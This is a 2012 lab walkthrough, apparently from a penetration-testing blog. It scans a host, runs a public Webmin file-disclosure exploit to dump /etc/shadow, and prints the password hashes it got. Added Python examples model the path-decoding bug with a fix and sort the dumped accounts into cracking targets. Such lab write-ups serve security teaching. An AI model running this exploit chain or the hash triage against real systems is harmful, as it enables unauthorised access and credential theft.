Monday 30 January 2012

Privilege Escalation

This is a step-by-step walkthrough of privilege escalation against a lab host: scan it, assess it, then exploit the most promising service.

First, information gathering with nmap. The target host is 192.168.0.21:


root@bt:~# nmap -v -A 192.168.0.21

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-01-31 06:23 BNT
NSE: Loaded 87 scripts for scanning.
NSE: Script Pre-scanning.
Initiating ARP Ping Scan at 06:23
Scanning 192.168.0.21 [1 port]
Completed ARP Ping Scan at 06:23, 0.08s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 06:23
Completed Parallel DNS resolution of 1 host. at 06:23, 13.00s elapsed
Initiating SYN Stealth Scan at 06:23
Scanning 192.168.0.21 [1000 ports]
Discovered open port 445/tcp on 192.168.0.21
Discovered open port 139/tcp on 192.168.0.21
Discovered open port 22/tcp on 192.168.0.21
Discovered open port 80/tcp on 192.168.0.21
Discovered open port 10000/tcp on 192.168.0.21
Completed SYN Stealth Scan at 06:23, 0.12s elapsed (1000 total ports)
Initiating Service scan at 06:23
Scanning 5 services on 192.168.0.21
Completed Service scan at 06:23, 11.03s elapsed (5 services on 1 host)
Initiating OS detection (try #1) against 192.168.0.21
NSE: Script scanning 192.168.0.21.
Initiating NSE at 06:23
Completed NSE at 06:23, 1.01s elapsed
Nmap scan report for 192.168.0.21
Host is up (0.00060s latency).
Not shown: 995 closed ports
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 4.6p1 Debian 5build1 (protocol 2.0)
| ssh-hostkey: 1024 e4:46:40:bf:e6:29:ac:c6:00:e2:b2:a3:e1:50:90:3c (DSA)
|_2048 10:cc:35:45:8e:f2:7a:a1:cc:db:a0:e8:bf:c7:73:3d (RSA)
80/tcp    open  http        Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Site doesn't have a title (text/html).
139/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: MSHOME)
445/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: MSHOME)
10000/tcp open  http        MiniServ 0.01 (Webmin httpd)
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
|_http-favicon: Unknown favicon MD5: 1F4BAEFFD3C738F5BEDC24B7B6B43285
MAC Address: 08:00:27:F9:C1:BB (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:kernel:2.6.22
OS details: Linux 2.6.22 (embedded, ARM)
Uptime guess: 0.061 days (since Tue Jan 31 04:56:12 2012)

Next, vulnerability assessment with Nessus. The Nessus results were shown as a screenshot in the original post (not reproduced here), with a link to the detailed report.

Of the five services found, the Webmin instance on port 10000 is the most promising target, so the next step is to search the local copy of Exploit-DB for Webmin exploits:

root@bt:/pentest/exploits/exploitdb# ./searchsploit webmin
 Description                                                                Path
--------------------------------------------------------------------------- -------------------------
Webmin BruteForce and Command Execution Exploit                             /multiple/remote/705.pl
Webmin Web Brute Force v1.5 (cgi-version)                                   /multiple/remote/745.cgi
Webmin BruteForce + Command Execution v1.5                                  /multiple/remote/746.pl
Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit          /multiple/remote/1997.php
Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit (perl)   /multiple/remote/2017.pl
phpMyWebmin 1.0 (window.php) Remote File Include Vulnerability              /php/webapps/2451.txt
phpMyWebmin 1.0 (window.php) Remote File Include Vulnerability              /php/webapps/2451.txt
phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities             /php/webapps/2462.txt
phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities             /php/webapps/2462.txt
phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities             /php/webapps/2462.txt



root@bt:/pentest/exploits/exploitdb# perl platforms/multiple/remote/2017.pl

Usage: platforms/multiple/remote/2017.pl <url> <port> <filename> <target>
TARGETS are
0 - > HTTP
1 - > HTTPS
Define full path with file name
Example: ./webmin.pl blah.com 10000 /etc/passwd
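The 2017.pl exploit used below abuses the Webmin < 1.290 arbitrary file disclosure (CVE-2006-3392). The published root cause is an ordering bug: miniserv canonicalised the request path before percent-decoding it, so an encoded traversal sequence passed the ".." check and was only decoded afterwards. The following is an added model of that bug class, written for this page; it is not miniserv.pl and not the exploit's code. DOC_ROOT is an assumed value, and the bypass shown uses %2e%2e (an encoded ".."), not the "..%01" sequence the public exploits send, so only the ordering mistake is reproduced, not Webmin's exact byte-level behaviour.

```python
"""Model of the bug class behind the Webmin < 1.290 file disclosure:
canonicalising the request path BEFORE percent-decoding it.

Added example; not miniserv.pl and not the 2017.pl exploit. DOC_ROOT is
an assumed value, and the bypass uses %2e%2e (an encoded ".."), not the
"..%01" sequence the public exploits send.
"""
import posixpath
from urllib.parse import unquote

DOC_ROOT = "/usr/share/webmin"   # assumed document root for the model


def simplify_path(path: str) -> str:
    """The server's anti-traversal step: collapse '.' and '..' segments.
    Absolute paths cannot climb above '/', so '/a/../../x' -> '/x'."""
    return posixpath.normpath("/" + path.lstrip("/"))


def vulnerable_resolve(request_path: str) -> str:
    """Vulnerable order: simplify first, decode second.

    simplify_path never sees '..' when it arrives as '%2e%2e', so after
    decoding the '..' segments survive and the kernel resolves them.
    Returns the path the OS would actually open."""
    simplified = simplify_path(request_path)
    decoded = unquote(simplified)
    return posixpath.normpath(DOC_ROOT + decoded)


def fixed_resolve(request_path: str) -> str:
    """Hardened order: decode exactly once, reject control bytes, then
    canonicalise the *joined* path and check it is still under DOC_ROOT.
    Raises ValueError for anything that must not be served."""
    decoded = unquote(request_path)
    if any(ord(ch) < 0x20 or ch == "\x7f" for ch in decoded):
        # '..%01'-style tricks decode to control bytes; never let those reach open()
        raise ValueError("control character in request path")
    full = posixpath.normpath(DOC_ROOT + "/" + decoded.lstrip("/"))
    if full != DOC_ROOT and not full.startswith(DOC_ROOT + "/"):
        raise ValueError("request path escapes the document root")
    return full


def is_served(request_path: str) -> bool:
    """True if fixed_resolve would serve the path, False if it rejects it."""
    try:
        fixed_resolve(request_path)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    probes = [
        "/unauthenticated/style.css",                              # benign
        "/unauthenticated/../../../../etc/shadow",                 # plain traversal
        "/unauthenticated/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow", # encoded traversal
    ]
    for p in probes:
        fixed = fixed_resolve(p) if is_served(p) else "REJECTED"
        print(f"{p}\n  vulnerable -> {vulnerable_resolve(p)}\n  fixed      -> {fixed}")
```

Run stand-alone, the model shows the plain `../` probe being neutralised by `simplify_path` in both versions, while the `%2e%2e` probe walks out to `/etc/shadow` in the vulnerable version only. The fixed version does not rely on the simplifier alone: it decodes once, refuses control bytes, and checks containment on the final joined path, which would also have stopped the traversal had the decode/normalise order been wrong.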


Use the file disclosure to read /etc/shadow and learn which accounts exist. /etc/shadow is readable only by root (and the shadow group), so getting its contents back also confirms that the Webmin server is running with root privileges:

root@bt:/pentest/exploits/exploitdb# perl platforms/multiple/remote/2017.pl 192.168.0.21 10000 /etc/shadow 0

WEBMIN EXPLOIT !!!!! coded by UmZ!
Comments and Suggestions are welcome at umz32.dll [at] gmail.com
Vulnerability disclose at securitydot.net
I am just coding it in perl 'cuz I hate PHP!
Attacking 192.168.0.21 on port 10000!
FILENAME: /etc/shadow

FILE CONTENT STARTED
-----------------------------------
root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::
daemon:*:14040:0:99999:7:::
bin:*:14040:0:99999:7:::
sys:*:14040:0:99999:7:::
sync:*:14040:0:99999:7:::
games:*:14040:0:99999:7:::
man:*:14040:0:99999:7:::
lp:*:14040:0:99999:7:::
mail:*:14040:0:99999:7:::
news:*:14040:0:99999:7:::
uucp:*:14040:0:99999:7:::
proxy:*:14040:0:99999:7:::
www-data:*:14040:0:99999:7:::
backup:*:14040:0:99999:7:::
list:*:14040:0:99999:7:::
irc:*:14040:0:99999:7:::
gnats:*:14040:0:99999:7:::
nobody:*:14040:0:99999:7:::
dhcp:!:14040:0:99999:7:::
syslog:!:14040:0:99999:7:::
klog:!:14040:0:99999:7:::
mysql:!:14040:0:99999:7:::
sshd:!:14040:0:99999:7:::
vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::
obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::
osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::
yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::
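A dumped shadow file is only useful once you know which entries are real accounts and how their passwords are protected. The following added example (written for this page, not part of the original post) parses shadow lines and buckets the accounts: locked entries (`*` or `!`), entries with an empty password field (login with no password), and hashed entries, for which it reports the crypt(3) algorithm and salt and converts the last-change day count into a date. SHADOW_SAMPLE is a subset of the dump above; the omitted lines are all locked system accounts like `daemon`.

```python
"""Triage of a disclosed /etc/shadow: which accounts can actually log in,
what hash algorithm protects them, and when the password was last set.

Added example, not from the original post. SHADOW_SAMPLE is a subset of
the shadow content dumped above (the omitted lines are all locked system
accounts such as 'daemon').
"""
from dataclasses import dataclass
from datetime import date, timedelta
from typing import Dict, List, Optional

SHADOW_SAMPLE = """\
root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::
daemon:*:14040:0:99999:7:::
www-data:*:14040:0:99999:7:::
dhcp:!:14040:0:99999:7:::
mysql:!:14040:0:99999:7:::
sshd:!:14040:0:99999:7:::
vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::
obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::
osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::
yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::
"""

# crypt(3) prefix -> algorithm. descrypt and md5crypt are the fast, weak ones.
ALGORITHMS = {
    "$1$": "md5crypt",
    "$2a$": "bcrypt", "$2b$": "bcrypt", "$2y$": "bcrypt",
    "$5$": "sha256crypt",
    "$6$": "sha512crypt",
    "$7$": "scrypt",
    "$y$": "yescrypt",
}
WEAK = {"descrypt", "md5crypt"}
EPOCH = date(1970, 1, 1)   # field 3 of shadow counts days since this date


@dataclass
class ShadowEntry:
    name: str
    status: str                 # "hashed", "locked" or "empty"
    algorithm: Optional[str]    # only for status == "hashed"
    salt: Optional[str]
    last_change: Optional[date]


def parse_shadow_line(line: str) -> ShadowEntry:
    fields = line.rstrip("\n").split(":")
    if len(fields) != 9:
        raise ValueError(f"malformed shadow line: {line!r}")
    name, pw, lastchg = fields[0], fields[1], fields[2]
    last_change = EPOCH + timedelta(days=int(lastchg)) if lastchg else None
    if pw == "":
        # Empty field: the account logs in with NO password at all.
        return ShadowEntry(name, "empty", None, None, last_change)
    if pw[0] in "*!":
        # '*' = never had a password, '!'/'!!' = locked (passwd -l).
        return ShadowEntry(name, "locked", None, None, last_change)
    if not pw.startswith("$"):
        # Legacy 13-character DES crypt: the first two characters are the salt.
        return ShadowEntry(name, "hashed", "descrypt", pw[:2], last_change)
    algo = next((a for p, a in ALGORITHMS.items() if pw.startswith(p)), "unknown")
    parts = pw.split("$")          # ['', id, (rounds=N,)? salt, hash]
    salt = None
    if algo in ("md5crypt", "sha256crypt", "sha512crypt") and len(parts) >= 4:
        salt = parts[3] if parts[2].startswith("rounds=") else parts[2]
    return ShadowEntry(name, "hashed", algo, salt, last_change)


def parse_shadow(text: str) -> List[ShadowEntry]:
    return [parse_shadow_line(ln) for ln in text.splitlines() if ln.strip()]


def triage(text: str) -> Dict[str, List[str]]:
    """Bucket accounts by what an attacker can do with the entry."""
    entries = parse_shadow(text)
    return {
        "login_without_password": [e.name for e in entries if e.status == "empty"],
        "weak_hash": [e.name for e in entries if e.status == "hashed" and e.algorithm in WEAK],
        "strong_hash": [e.name for e in entries if e.status == "hashed" and e.algorithm not in WEAK],
        "locked": [e.name for e in entries if e.status == "locked"],
    }


if __name__ == "__main__":
    for e in parse_shadow(SHADOW_SAMPLE):
        print(f"{e.name:8} {e.status:7} {e.algorithm or '-':12} "
              f"salt={e.salt or '-':9} last_change={e.last_change}")
    print(triage(SHADOW_SAMPLE))
```

On the dump above this leaves five accounts worth attacking (root, vmware, obama, osama, yomama), all with `$1$` md5crypt hashes set in June 2008. md5crypt is a fixed 1000-iteration MD5 construction, so these are cheap for john or hashcat compared with the sha512crypt or yescrypt a current distribution would use; the salt is needed unchanged for either tool.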
